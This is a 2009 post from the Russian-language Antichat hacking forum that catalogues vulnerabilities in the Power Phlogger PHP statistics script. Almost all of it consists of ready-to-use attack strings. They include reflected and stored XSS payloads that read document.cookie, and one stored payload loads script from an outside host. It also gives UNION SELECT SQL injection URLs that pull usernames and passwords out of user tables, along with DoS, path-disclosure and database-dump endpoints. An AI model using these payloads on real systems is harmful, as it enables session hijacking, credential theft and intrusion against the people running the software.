ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

[Обзор уязвимостей Power Phlogger]
  #1  
Старый 04.01.2009, 23:12
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию [Обзор уязвимостей Power Phlogger]

Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability

Power Phlogger Rel_Path Remote File Include Vulnerability

Power Phlogger Login.PHP SQL Injection Vulnerability

Power Phlogger 'css_str' SQL Injection Vulnerability

Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

Power Phlogger v.2.2.5 (username) SQL Injection


XSS:



Код:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit
Код:
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php/%22%3E%3Cscript%20src=XSS
Код:
http://site/dspStats.php/%22%3E%3Cscript%20src=XSS
Код:
http://site/edCss.php/%22%3E%3Cscript%20src=XSS
Код:
http://site/edCss.php?action=create+new&fields%5Bcss%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3E





XSS (Persistent):


Post запрос на странице http://site/edUserprofile.php


Код:
</textarea><script>alert(document.cookie)</script>
В параметре N_your_url

Код:
"><script>alert(document.cookie)</script>
В параметре N_email

Код:
"><script src=http://site.com
В параметрах N_fg_c, N_bg_c(до 30 символов)


DoS:


http://site/include/get_userdata.php

http://site/newaccount_self.php

Зацикленные редиректы.


(c)MustLive


SQL иньекции:

Код:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
Код:
http://site/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--
Full path disclosure:


http://site/include/edCss.inc.php

http://site/include/foot.inc.php

http://site/include/get_csscolors.inc.php

http://site/include/head.inc.php

http://site/include/head_stuff.inc.php

http://site/include/loglist.inc.php

http://site/include/pphlogger_send.inc.php

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/edit_user.php

http://site/main-dummy.php

http://site/main.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php



Information disclosure:



http://site/modules/db_dump.php
Названия базы данных,струкрура таблиц

http://site/robots.txt

http://site/upgrade/extchange.php

http://site/main_location.inc

Код:
<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
[Обзор уязвимостей Phorum] _-[A.M.D]HiM@S-_ Форумы 11 23.05.2010 13:42
[Обзор уязвимостей phpBB] qBiN Форумы 46 10.04.2010 23:52
[Обзор Уязвимостей Yabb] _-[A.M.D]HiM@S-_ Форумы 8 08.11.2009 23:58
[Обзор уязвимостей myBB] Goudini Форумы 24 04.09.2009 22:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ